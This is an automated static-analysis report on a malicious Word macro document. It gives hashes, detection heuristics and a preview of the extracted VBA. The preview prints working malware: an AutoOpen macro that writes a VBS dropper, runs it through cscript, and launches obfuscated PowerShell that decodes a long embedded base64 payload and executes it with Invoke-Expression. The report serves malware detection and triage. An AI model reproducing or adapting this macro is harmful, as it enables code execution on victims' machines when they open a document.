Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 cb3c593e3d60331c…

MALICIOUS

Office (OOXML)

35.0 KB Created: 2021-02-17 08:21:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-02-23
MD5: 22a00308eb83565200afa390984a0a83 SHA-1: 20250ce1bdfdf3393161237acbff7321b989188a SHA-256: cb3c593e3d60331c11498434a4b3a1323827bda0311abc38e663c701ad0e4a0c
250 Risk Score

Heuristics 8

  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
        Shell "cscript C:\Users\WinUline\AppData\code.vbs", vbNormalFocus
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
        x = "Set oShell = CreateObject (""WScript.Shell"")" & vbNewLine & "oShell.Run" & Chr(34) & XCsmNd & Chr(34)
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        x = "Set oShell = CreateObject (""WScript.Shell"")" & vbNewLine & "oShell.Run" & Chr(34) & XCsmNd & Chr(34)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 20224 bytes
SHA-256: c2c510e154c91a7827341302aa9fc61c7721f6c69d3b9bba628b6e5898c68394
Detection
ClamAV: No threats found
Obfuscation or payload: likely
383 of 422 identifiers look randomly generated (e.g. 'RldOWkRWU1U1YkRYa2NXZHMxMFcxV1') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Sub AutoOpen()
Dim msgBoXX As Object
    Dim XTukL, XCsmNd As String
    XTukL = VVV
    XCsmNd = Replace("poXXXweXXXrshXXXelXXXl", "XXX", "") & " -Command $t= " & Chr(39) & XTukL & Chr(39) & ";$x=$t.ToCharArray();[array]::Reverse($x);$n =$t.length;$b='';for($i=0;$i -le $n; $i=$i+2){$b=$b+$x[$i+1]+$x[$i]} for($i=0;$i -lt 10;$i++){$b=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($b))};Invoke-Expression -Command $b"
    
    
    Dim x As String
    x = "Set oShell = CreateObject (""WScript.Shell"")" & vbNewLine & "oShell.Run" & Chr(34) & XCsmNd & Chr(34)
    savefile x
    Shell "cscript C:\Users\WinUline\AppData\code.vbs", vbNormalFocus
    
End Sub
Function VVV()
    Dim str As String
     str = ""
    str = str & "k=MDVUUFhkVVpXbFRVZDZrVFJSYTRX"
    str = str & "VmJOWnYxYVtaVmpYbFhlaGRtc1ZSZF"
    str = str & "prVVFaWmVrVm1oU2pGRlNXdHZtMltZ"
    str = str & "TWRXSGhlWkNsYVd0VFJxR1hiSlVuR1"
    str = str & "FOZDRhV3hXaGIzaVxoV25zRkdkRlZq"
    str = str & "MFtvYWxXRWdjSkRtMFcxVkp5VldNdF"
    str = str & "VHSGZwVEp3a1FZSmJGUmhwU1ZXMkFU"
    str = str & "YzZsMF13VmRORmlhMUdFYVVaVFV3Rl"
    str = str & "piaFVsSFJKVTRrR3VWbDJsbFxaVmRX"
    str = str & "bG9NZGYwcFZwYkpUalRTTnVHQmxSVm"
    str = str & "gyV2diWldsR1JOVjF4VExZcEExWGxk"
    str = str & "U2pzbF9XVklVelxwUmRWbmJXbHZWb1"
    str = str & "tkWWhUR3ZXZF1Wd0JRZDB3bTRWTj1t"
    str = str & "U0ZoYkJ0MVdSRnZqMVZVTUJXaldWSl"
    str = str & "lWb1BkWTZYREdNOVNFWGxaV2Z3bFlZ"
    str = str & "UlJHWGNkYTRHMWBkMTZtaF14ZWhTbW"
    str = str & "VUWnYxMVpBVmF3bVdSWlNIR2AxVTEw"
    str = str & "VzFWUj1XV0ZkTVt5RmtTeEZtWV14Um"
    str = str & "ZoWFdNVX1GeExjVm94RmNieFNHc2xk"
    str = str & "VmZ3akhWWmZFWlZsY0pHbEtheGUyNF"
    str = str & "ZWTVhTM2NZWn5sd0taWWpUbEhScGRY"
    str = str & "SFdSWVJHa1hXQmZuV1xWUmZIR19TeE"
    str = str & "lXcldoTVJXRFNiWnQxa1FoVTB4Rnxi"
    str = str & "SmFGc2ZsVkBzWHZZeFEyVmVoWkV4Rl"
    str = str & "hOMHZtVl1oTWxTR2djRkIyR1BkVTpy"
    str = str & "a1dhSlVuWVJKVjBDMnlWRnJUV1U5ZU"
    str = str & "l5VldlWnlrWVpsUn5hSEhiUX1Wekcx"
    str = str & "VlB2RXliZGpGc1ZWV0ZzakNVaD1XV0"
    str = str & "xKU2B3RTRhZDkwelZaYkRqa2dXcE5G"
    str = str & "R0d0WVpYRURiZFNsV1FsVjF3bTpWd3"
    str = str & "EyU2doZEVYVTplWlpWVFRGYllXazZX"
    str = str & "WkYxa1d4VlBIVnpNTmVGWGxaZWRvbG"
    str = str & "RZeFIyYV5KVGZHbVdXUkdreVhCTVRo"
    str = str & "RmNiTnNsS2RKVlBQVnFSbGdrVl1KYW"
    str = str & "M1MnNWVjJsVV5kVmpyVl9ZZGlsV1Za"
    str = str & "V0ROWGhXWXUxQ1FSVjpKMEhNNWdrc1"
    str = str & "ZKVlhhMnJZcHZsYVROY0pzVl9WWmRs"
    str = str & "eVtwTWZWR0RjWnNGd1ZWVFVYazxSaG"
    str = str & "pGR1JGYjhrV3VXaF1tU0dsYk5zMUNS"
    str = str & "ZFdWSFNCVj5YakJWVnYya114VWJWV1"
    str = str & "pNRmVHSGxaZGBHbnhVeFJtWG5OU2pH"
    str = str & "MkRkSjZqWFVwYkhXbXZUNVRFc2pGVm"
    str = str & "p6RkZiRlNIcmdKVkVPbTlVeFJtTlho"
    str = str & "TUp0MVdTdHZtcFs1UmJsSFhaTXIyYV"
    str = str & "RGV1hvR2lXVmRsRVJOUjFLbTRWaFYz"
    str = str & "V1RCY0pybFtXaGlVNFxWUmZOekhjUl"
    str = str & "dGb1BkVjpVa1hiZFZrdFZKTUprMVFW"
    str = str & "SlNFaVZOY0pIbUNjWlpWT11SVmhYR2"
    str = str & "lhSlYyT11wVWZ6VEhSOWVHWGZaZUp3"
    str = str & "VlRUUlJYYVhkV1ZHVlFZeGZtaFNoUj"
    str = str & "hUbXVVTnMxR2RKVkEwMldhUlNER2JK"
    str = str & "VTFvRzhWRlJUa1xkV2t3RmdWUklsWF"
    str = str & "VKYkhWRWdaWlExYWd0V1kwVl5WWkVs"
    str = str & "VVUxZEphVVxWWk1GV0ZSZUl5MVFUVm"
    str = str & "kwNFsxTWRXRWhjWlRWQ1ROWVBvRnJi"
    str = str & "ZFRrdFJOVjl4akdWa3JsTlZwWk5GMk"
    str = str & "tSZEYwd1ZZVl5aREhkSkJHa2VoWlow"
    str = str & "bFhWTlpGc1ZWY1phMFBVaHdHVFhoVV"
    str = str & "FIMDFhdGZtYVdoYl5ORkdhcEMxT2Fa"
    str = str & "VToza1dhQldsclJGVjpTVVpZcF1rV0"
    str = str & "hkTlV5MVNSZFRWV1dSUlphSENaNXYw"
    str = str & "MFZkVkBVVnlWaGpGc1ZWZUZaVEZWaH"
    str = str & "YzWFxsU2pyMkRVZDlVeVdSTVRXa2VT"
    str = str & "WlFGYW14VmpZVVJibFdsc1FSZDZrRE"
    str = str & "VWQjEzV21wUmZIR1dTWnlVaFVaVkRa"
    str = str & "RmhhSkVtV1I1VTp6a1hNZGdsR1xaZW"
    str = str & "paa1hZVlF6WG5OU2pXVkFZQmZUTVxw"
    str = str & "UmROVmJPVnRGS2ZaV1hQMmhhcFNIV2"
    str = str & "sxVmFHVzZVcF1WaUc5Wkl3RlNjMVVt"
    str = str & "b1JoYThUbGhXTXVGam14VmBaRnhiNW"
    str = str & "drc1ZaY1ZhakRWVjZsWltSUWF1az9W"
    str = str & "aGkwelVwYkRVSGRlVnZsNFZkVFVWaz"
    str = str & "5WUkZuc1JOYjJLVlhXaFYyU1dGYUpZ"
    str = str & "RkNXWnRVclhSYlxXWGJSSnUyc1tkV2"
    str = str & "B6VnNNZFNrNlxsY2Zha1hVWmIwalxk"
    str = str & "V2l4MVRVMTZteV04VmROVmhPVkVXWm"
    str = str & "BaVjIzM1VWaFVsWFxaVGVTMjhWWl1s"
    str = str & "VkhoTUpYMVRWZDZrcFZKYkZTblhXSX"
    str = str & "QxS1dwV1kwa0dlZF9WSE1GZWZaakFW"
    str = str & "TT1uVkRGTlpyRkFiVmdrWF1SUmRYbm"
    str = str & "dXUldGS1tWVmBZRnRiaFdYeFJNYTow"
    str = str & "akJWQT1YaEZkY0JIR1tkWkkxWFZwUl"
    str = str & "JXbFhVSkYyR1VkWVBZa3dNZFVGeWZV"
    str = str & "TUp3VldUNVJFWGtkV2VXMDFRMDZtUF"
    str = str & "ZwYkRTR3JhVnNGU1ZkV1poa0dhVldr"
    str = str & "R1ZaYVhrbXFVNT1VU0dGZUpIRl9WSm"
    str = str & "lUYVJoYThWVmJNVn5Wd0ZjVlI0bklS"
    str = str & "ZG9WdEZOY1pXMFhZaGJYVmdoY0pyR0"
    str = str & "tXdGZXNVZWTVRTWGRNWnNsQ1ROWVhU"
    str = str & "MnFSTmJuc1A1UjhrbX1WQkJYV1ZkYU"
    str = str & "JZbFplRkZqdlZaYk5VREZiMVFFMGVk"
    str = str & "WlowRl5iTk1UdEFWYjFTbTlZcFJGVm"
    str = str & "VkWkl4MkNUWlYxWV1oTWRXVmJOTnNW"
    str = str & "d1VaWlBXbHhWUlNrV1AxVjJLMVNVQj"
    str = str & "JUaF10V2RyRmNTNUZtVVdSUlphRldj"
    str = str & "bFQxYWZWVkZZelhhUmNsdVZKZVZaak"
    str = str & "BZbzFrV2RaY0pzVl9hWmpFSVFaUjZr"
    str = str & "bUdXWX0xYU14VmBWRX9XWkNsc1JGYj"
    str = str & "o0akZWcDJFTm10Ump0MVFSWmYxMFJR"
    str = str & "YTJXRlllSXFsc2J4VTVIVTdNaFkzcl"
    str = str & "ZaVFZLMFlVUlJtYVxsV25zMktWcEZt"
    str = str & "MlhCTVhobGVSNVJrS1RKVlV3VEZiaF"
    str = str & "NIc2xaVGhhbXZVeFZtWlVOTlp0RldV"
    str = str & "dHltVVJSYTRYVmJOVnMyU114VmBZMH"
    str = str & "lhTmJGSGdSU0p3MVhVUlJXYVdoY0FX"
    str = str & "MD9WaGZsNFVWYl5XVUhOWl1Gd0taWW"
    str = str & "JWM1hSTmduR1A1UjQ0RmZWSnJWU2d4"
    str = str & "YkRZRmdlQXZqaFhSYlxXbGdXWkUxR1"
    str = str & "cxVkAxVndNOVNrcVZWYUZha1lWeFJt"
    str = str & "UmtsU2l5MVtSVmdWYVhCYkhTbXZXMV"
    str = str & "VVWmd4WlV2azdhaFVGeW1FVmVTMjhV"
    str = str & "UkJtTl10VmRXRmpNWllrVFRsUl5hSE"
    str = str & "haWXUxR11wVmA2a3lScGJGV2s1Y2RL"
    str = str & "MGJWcHExWmRSTVpybE9UTmdUNFZsYk"
    str = str & "5XRUNhVnNGU2tkWWVTazdiZFVseVFZ"
    str = str & "Ujh3MWZWQnZuU1ZOWkZHbU9jWkpVR1"
    str = str & "dSTUpXblhVMUdrd1BoWTB5bHhSQm1U"
    str = str & "eUxZZWhLbXNWWnIwbF5SV214Mk9RdG"
    str = str & "dXVVFwYThpbGVUWndGeF1zVmV3VEdi"
    str = str & "OVFHdGAxVTFzVzhWWkYwWF10V2BWMX"
    str = str & "dVeHZtWVtKZWppbklSWXIxMGZkVlJL"
    str = str & "M05hZEFsVVUxV0hhbXRVaEZtVV5GVW"
    str = str & "pIR09XaGYxSFtaTWJUREdaZFdWd1RC"
    str = str & "WVhUMmhSTmRueFJNUjJLVllXSlJsTm"
    str = str & "xkUWI2R1FXeGZHdlRGYlxWa2hXWXJG"
    str = str & "d2VaWlAwbHNSZFVsc1ZsV0pLa1dZSl"
    str = str & "JsVG5OUmF5MVBiSjZqWlxaZWVoRThh"
    str = str & "cENsV2J4WTByVndSTldqRlxaV2A1Vz"
    str = str & "BWcDZrWlhOZUV5RldXWnRWVVhSUlJq"
    str = str & "blNXNXQwNGcxVlpQRUlTVmZsclZOZV"
    str = str & "ZKekJVaHJYV2hoTUpybUtUWmlrMVxa"
    str = str & "UmRURXJabHVGd1RGWVhZR3xTaGNrdF"
    str = str & "JGUjZra1pXSlJrV2dwT1BIbHNjRnZq"
    str = str & "dldSTUxXRmhhZEZWb1FoVTY0bFpWQl"
    str = str & "1UdExaTWFvVzRUaFJtaV5SVWl4MUtU"
    str = str & "QmZUSVFKVjRORmdhTkYyYVZaV1Jybl"
    str = str & "dNZFNFVmAxVjM1VmVUbDJsVFhkZEJY"
    str = str & "RlNXSllUV1xwUm5pWEdOTXlXYVtaVm"
    str = str & "hZWGxiTmVGdGZWZFZhakJWWnFrV2ZS"
    str = str & "YUl6MVFWeGUyWFBwVjlobTJXZHdsU1"
    str = str & "ZkVFxUemNhVldsR1A1UThTV3lXeFVt"
    str = str & "U21wV25yVkZlRllqclNSVjZYbUpRRX"
    str = str & "UyU114VWAwa3pWZGVGSGZwYUZhVEdZ"
    str = str & "aFJHUm5WU2ZzMkRhSjZqNltwVmxOR2"
    str = str & "hkUkVXWmBaVTpYVkVWUlFGdGZKWVRr"
    str = str & "bXlWWlJWV21GVmpyMVtiRkRUWF5CUm"
    str = str & "Roa2RTNXIwa1pCVmpRRllWZGFscVZW"
    str = str & "V0V4a1hWQkdIWFhsY0pHMk9UdEZHVl"
    str = str & "d4TV5VVkRNVnFGd2RGWVhWV2FSZGJG"
    str = str & "V2ZsWVo0akJWazJUV2ZOWk5HMkVWVT"
    str = str & "pFcltaZWhaRXdjWldsS1c1Vlw2VWdN"
    str = str & "ZFVsclZsZVp3a1ZZUlEzV2NkYTFHMD"
    str = str & "RkMTZtWlRWVllXazVVZHIxYVRGVlJy"
    str = str & "M1hWbFNGR2dKYVpXVVpZSlZsbFtwV2"
    str = str & "BWVnNjaFlsWFtwZWhpWGhSSkEyNGpK"
    str = str & "VmI2M0dhcFRHdGZKY1pXRVRWcFZFWl"
    str = str & "dGYUpZRk9heGYyWFd4TVJqalFTWndW"
    str = str & "YVtWVWhPV2NiaFJrdFFKZDZhakVWWk"
    str = str & "ZGaVxkUmVYaztjMUZtUFJoYThaRmNj"
    str = str & "WnRsd1ZoVFJZR1didFdrc1ZsVko0ak"
    str = str & "hVcGZsT1hkVVp0MUdTMXZtM1poTWho"
    str = str & "R2daRkRHT214VWpyRVdWcFVuSFdKVl"
    str = str & "RrMnNWbDJrV1d0TlZ0RlFlWmRWT1ps"
    str = str & "Un5oSEdiZEExb1RCVlp4VkdiNVNrSV"
    str = str & "ZwZUpKakhZUmJYV21oU2B3RTFhVTdr"
    str = str & "eltwVmZXbUZSbDZGd114VmhoV2ZicF"
    str = str & "dYV1FaYjhhR3VWQjZuTlZWT1ZIV1pl"
    str = str & "WlUwWFZKYkJXbElRSldHa1J0VjpYbF"
    str = str & "JNOVVHWGFaZDpLbFRZaFIyaVhOWkZH"
    str = str & "bVdTcEZtTVVwYkRTbGVRNUQwSmZaWV"
    str = str & "B2MXphaFdrd1ZZYkh3MnhWeFJtVVc5"
    str = str & "YUxzMWFWdGlXWV1SVmROWGdWMUVFd2"
    str = str & "xjVm41R0lXTmVsR11SUmRXRWhacG1W"
    str = str & "V0t4VWpZbUVWYzpVSVBwUj5XVkhOWl"
    str = str & "5GeE1zVWJQWFhiTlduR1FSUThvbXBW"
    str = str & "VlF6U2doWk5GR0plWlpVV1tKYWpXal"
    str = str & "lRSkYyV1FaVDB5a3dWdFNrcVxaZGVv"
    str = str & "VzdUUlJXaltaU2ZIMktSVmdsMVZZYk"
    str = str & "lXRTNaRnNWYWVaVlgzWGZiSlVISGZk"
    str = str & "V0hPbGNUMT1VU0hkWkpzMV9NTmVqWF"
    str = str & "s1UmJrbldUUlMyR11wVmJvSEdiaFFG"
    str = str & "SGdOZUpGakhWUl1uV0VoY0pzRlthNW"
    str = str & "YyeVdSYkZsVEdWUlNWU2xoVWBoa3hi"
    str = str & "ZFdreFFZZDAxbTpWQlJuaV1oVGBHMX"
    str = str & "hWc3VtSFVwVk5XREZjWkYxU1dwVVAx"
    str = str & "RnVidFdtclZkTVRTa2FZNXJrU2RaYk"
    str = str & "B4MD9ieGdXWFRWUlBUR3lhSlVWWmpG"
    str = str & "WWJYbldNbFNFc2ZaYVhrR3dWNUIwa1"
    str = str & "dGZUV5MVFNeGZtVldoYkhWa2lTWXQx"
    str = str & "MVRJVlo2Rl5STkRGRmdOZEphRlRWaE"
    str = str & "EyWmZoYUp0Rk9hNUVtWFFKUjpsRURj"
    str = str & "WnVWd1ZWVFJvbkFSTmNuV1FaUzZhVl"
    str = str & "NXRjYxV1ZwY051MUFjWmYwcldoVlJh"
    str = str & "RENjSnYxR1NwWTowVllNRmN6dGZsV0"
    str = str & "RvMGdWaFdHVVhsVlVHMDRhMTZteVBJ"
    str = str & "TTRoRmRiUnMxS2BaVToza1dhaFJYRl"
    str = str & "ZKWVU1MFRZVjYwV1ZOY0pIVldXUkRV"
    str = str & "WFZaUkhObGNWZHIxU1d4Vlh2bXdlNV"
    str = str & "VrdVFkYzpXekBVRTJUV2xaU2pXMkFW"
    str = str & "czZXMVZwTVRTbGFSVnZGb1pOVmhZR3"
    str = str & "JicFJYWFJGYjZhVlFXQmEzU2ZSZER0"
    str = str & "MWtWeGpHTFFaYTxXbGNXRnVtV1I1Vj"
    str = str & "p6VkhNRmZtV1xkTWJGVVRUaFJtYVhO"
    str = str & "WkpzMVdkUkZGMlJoUjBpRndhNVNrS2"
    str = str & "cxVlgzR2ZiVlZqV1AxVTM1RWlaUlZt"
    str = str & "WF5kVmJXRldXcFlYVVtwYmhXWGhXRX"
    str = str & "5HeE0wVmh2bW5NZEJsSFJGYzhPbXxV"
    str = str & "RkJUV2xoVmFxaz9WdGZXWVRGTUJWRE"
    str = str & "ZacENWd114VmJzbVhiZFVseFJJYjB4"
    str = str & "VzhWSn1saEZOYUBHRn5lRkV6VFhoYl"
    str = str & "JXVEVSMURrT1taV2BIMHtWOWJrcVZa"
    str = str & "Tk5PakFWUmdHU1hGTVl3MVRhSjZUNl"
    str = str & "hCUlZpbFhSRkJtd1FaVjEwbVVWaFJG"
    str = str & "NmxaVGVTbTRWMTIwT110UWpxbFdXcF"
    str = str & "lYcF1SUmxobGhXSXVGQmZSV1V3RVlW"
    str = str & "ZGFGdGZGZFZhVEBWcFJGVWhsTlFWMD"
    str = str & "dWUlZsR15CUmloVzhOUllWd1BWVThx"
    str = str & "R2NXaFdseFJFYjhhbXhWa31WaEU1Wk"
    str = str & "lXRTdTZFpFWFhoYl5XaklVSlZtQ1xo"
    str = str & "VGB5VnVNTl5WeUZZU0RTVmdUUlJYWG"
    str = str & "tkV2pXMVFTQmZqd1JoUjZpRlZiTkVH"
    str = str & "WmpGVmJMM0hWQlNUclJWVjhvV3pVWn"
    str = str & "JFbGtaU2pVRlZNcERXWF14Ym5YbkdT"
    str = str & "ZEExYWZaVk93RmNiUlRGRmdWZEphMV"
    str = str & "BWbzZFWlxWVW5IbEtUaGYxWF14Vm5a"
    str = str & "a0hVWX1WWkd4WlVvazxSaGRreVFJVj"
    str = str & "JrVE9WQmJuTlxkVWZGR0hTQXZqelZw"
    str = str & "Vlxha2hVMVZVR1VkWkY1bFhWRlFtcV"
    str = str & "FWVDpvVEFUcGJrWGhoV1F4V1BZZDYx"
    str = str & "VlVwUlxYbWNXWnYxeF1zVWBUa3plaF"
    str = str & "NtclJGVjhrbGRVbDZraFdGZUZ0VlFN"
    str = str & "eGVtVVhSYlpYbkdXWkYxd1ZkVkBZRX"
    str = str & "hiZGpGWVFOYzpTVVRUQjZ6V1pSUWp1"
    str = str & "VkVhczZHMVtaVm5XbkdXa3ZGU1RKWV"
    str = str & "BhbH9WSkNuSFFaYTQwa2BWdzZXTl1o"
    str = str & "VG5GR0FkWmRrWFFwYTJabFZWRjdHa1"
    str = str & "10VmUwazdNRlZtclZkVFhDa2hZaFJt"
    str = str & "bFtaUm5IMUtTeGZtNlxaYWRORmdaTk"
    str = str & "QySmBaVjpyMVhhZFFrdVxKVGVrMjlW"
    str = str & "eH1XVUVOTlZ0MVtjeEltWFs1YmRYVm"
    str = str & "JNRnUxYVpGVmBaRnxiaGJHdGFkUjZ3"
    str = str & "akNVcDZWYVVkY0pzVl9WcEZHSVtwTW"
    str = str & "5XRkhjVldsd110Vmxvem5WaEdsc1JW"
    str = str & "ZDphRlhWcHZWaVxOUmp1MVdSRlZUNF"
    str = str & "RCYlBXRnZjSlYxYVd4VlUxazxScGJs"
    str = str & "NlZsYUZLa1lWcFFsUmhwUlV5MVRiMT"
    str = str & "ZXd1FJUjBpbXVUZHQxVmVaWlJHM1pW"
    str = str & "ZF5WRkxOYWRhMnlVUk1XaERSWkpzRl"
    str = str & "pNdFZtT1J4VjpQa1hUUklXNFpKVmBN"
    str = str & "bH5SWkZsc1ZGV1RLMGJWcHZsVVhsTl"
    str = str & "FyaztWdGZXeV1SUmBOa3JWWnNGU2tk"
    str = str & "WWpXMVVhUlRuWFZsTkRrbXJWaF1tTk"
    str = str & "ZOWkpzVk9SSkVqTFtwYWJXRkVhMXYw"
    str = str & "a1BaWTB6VXdNOVVFeWxVVmE0bTFWSm"
    str = str & "ZGTl5SVml4MktiUkdWV1pWYX5pRkli"
    str = str & "UlVGSmZkV1JoWFdicFNGd2dFYVprbF"
    str = str & "lUUn1XV0pWY3t5RmdXWnZsaFBaUj5q"
    str = str & "bkdXZE5GMEpKVmpJRV5SZEZsNldOZV"
    str = str & "haV3NaaDJYVmZkYko2MUNhaHZsWF1S"
    str = str & "VmZaR0hlZFZWd1VaVFJUWFZiVlpIeF"
    str = str & "dNTVJCa1NXVjZFaVZkYk5HMktSSkZU"
    str = str & "d1pFTWZWREdjMVYwNVJzVjJXWEdNRl"
    str = str & "VHdGZaV1pha1VZaFNHTlhkV1V4V0BZ"
    str = str & "ZDYxMlBJTTRobGdURkVtTmBkVjBobH"
    str = str & "VWTlNrR11KV2pvVVBacDJVV2ZOTlV5"
    str = str & "RldOWkRWU1U1YkRYa2NXZHMxMFcxV1"
    str = str & "pVMUlSVmpGclZKZVpOakhWWmZsWFhk"
    str = str & "Ull4bEtUWmdrSFBaVjpsRVJaWnRsb2"
    str = str & "0xVWpYbEdhZFdYc1FkVTp3VERWQjJI"
    str = str & "V2ZwT150VkFjWmkwWFZKYklWbTNTSn"
    str = str & "Yyb1ZoVkY1MFpWRlRHeWxZZGRLbXhZ"
    str = str & "UlJHU2toVWp0MUtUcEdYb11oYmRObG"
    str = str & "NVVndWS1pKVmZ2VFZiWlJrRVAxVjJD"
    str = str & "a1dXQkZuWFdGZUp0MVNUZFUwclxKYm"
    str = str & "hXWGlTVXVGd2xjVmg0R2lXTmJsSFFw"
    str = str & "YzphMFhVVXZWYVpOUWpVMkdWeEYySF"
    str = str & "ZwTV5WWEhNWlVsd2ZaVFJxR1NiRlZu"
    str = str & "R1FWVTB4bTpWaF1tU0doYk5zVkplRl"
    str = str & "VqaFVKVkpYallRWlRsYVd4VkJKSEdi"
    str = str & "TlVIeWZVU0pLbFZWcFNFaltkU2V5Vl"
    str = str & "NZdFdXSVtwVmJObFVVMVRFYWFaVjpM"
    str = str & "RlZNbFFGdGZKWVVLRzhWNU1VVEt0VW"
    str = str & "RXMWZkdFpXWF1SUmBhWHhTVkJtS11w"
    str = str & "VmJVWEhNaGFGcmZGV1F4akJWVnJUVm"
    str = str & "5oV2FXazVUYzlVel14UmZYbUFRVnIx"
    str = str & "S214WWVVazNibFRYV1AxZDhqbXRWTj"
    str = str & "dHaVZkTlJyMVdSWnYxNFZWTUhXR2dj"
    str = str & "MVZrNFBWWTBIVXhiOVVHWGxWU2R3V3"
    str = str & "hUUlJtbFhsV1VHRTplZHZGWFZwTUhT"
    str = str & "bXVVZHMxV2cxWkpEbEhWWlFudVZKYV"
    str = str & "pLa1hZVlF6amt0UmY2bF9jaGlsWFps"
    str = str & "UnpqVlZNRkQyYWZWV1I2M0dhZFRGRm"
    str = str & "dWU0ZhVEZURnJUV2ZaZUp0bE9hNUUy"
    str = str & "WFZwTVZoekdZWlYxb1pOVmhPV3NiaF"
    str = str & "ZrSFJSVjBHV3VXQlJYV1xwV2ZHR1tT"
    str = str & "WmYwdl1oVmJXVFZNMVEwNWVjWlAwVn"
    str = str & "VNdFZrd1ZZV0JXbF9VaGJXalhoU1F4"
    str = str & "V1dZUkZsMFZZVl5TbEhSUkJtT1pKVW"
    str = str & "Y0a0dhWlVuelFZVjhzbXZVcF1WV0U5"
    str = str & "YUJzVlNOeHZtc11SYmRXbGdVZEMxU2"
    str = str & "d4VlB5RXliZGpGclZaZVZWVEhZcGEx"
    str = str & "V2ZoY0pyVlNhZHdrels1VmZrbUFSVn"
    str = str & "NGd1tWVWhoR2RiSlJueVFZUzZhVlhX"
    str = str & "WXVraGxWVGBJbHtjWmpWeFxVVmJVbF"
    str = str & "ZXWkYxYVBaWTVYazlNOWVHWGZkV1Fv"
    str = str & "VzRUaFIyaFVaY0l4MVtSUkdWd1xFTW"
    str = str & "RoRmZiTkIyeFpBVmh2M2dSaFdreFFJ"
    str = str & "YThrbXZVSlJsaFxOVGpxRlFhVmlsVV"
    str = str & "JSYTJUblhXSX1HS0xSVmYzRUlTTm5W"
    str = str & "RkFwYzZhekJZaH1uVktSVmpVbUNWaE"
    str = str & "kwSFBwVjlXRTJhZH5GR0xaWWpxVVJi"
    str = str & "VldsV1FSYjJLRllWcFJsaVxOVmp1MV"
    str = str & "tWRmV6TFhCYlFXRTRhMXFFb2VaWVV5"
    str = str & "VTpNaGFYVVxsY2p3bFhVeGJHVmZoTV"
    str = str & "V3R0BNZDZWV1VwYkRTVmhPcEMxc2pG"
    str = str & "VmhoWGpibFFGSGZkVlhzMWhWWkJWaG"
    str = str & "RCTVp0MVtUVkYwVFJ4UjRha2lSSXMx"
    str = str & "a1pGVmBRMXxhcGVscVxKY2pHakRWcF"
    str = str & "ZWWlRaYkFWMDtWaGpFNVZsTV5OSERk"
    str = str & "VndGS1tWVmhPR3hXZFpFeFZVZUN3bG"
    str = str & "FWaGIzV11sVWpzMVtSSkl6aFFwYTpV"
    str = str & "bkpVWXdGd1d4VVBaa3hSRlN6eWZVTV"
    str = str & "hhbXNVcHJGU2VWY0JHMV9ReGdXWVtK"
    str = str & "YmBTbXdXMVQwWmZaVFpXMVhhcFZrNl"
    str = str & "1GVGR3a2lXUnJtbF5KV2l3MVFNVmZr"
    str = str & "YVdoYkRUa2lTVXYxNFRKVll3MU5WVk"
    str = str & "JsdFFaYzhrMnRVNUZFWlU5Y0pzRlNV"
    str = str & "NVZXWFZwTVZqR0hkWk1GWktaWWpYRl"
    str = str & "hiTlZuR1FOUzJLbFlWaFJtTmZkYUpz"
    str = str & "bEdOSklUSFdSVlxhRmNjSnZsT1xWVG"
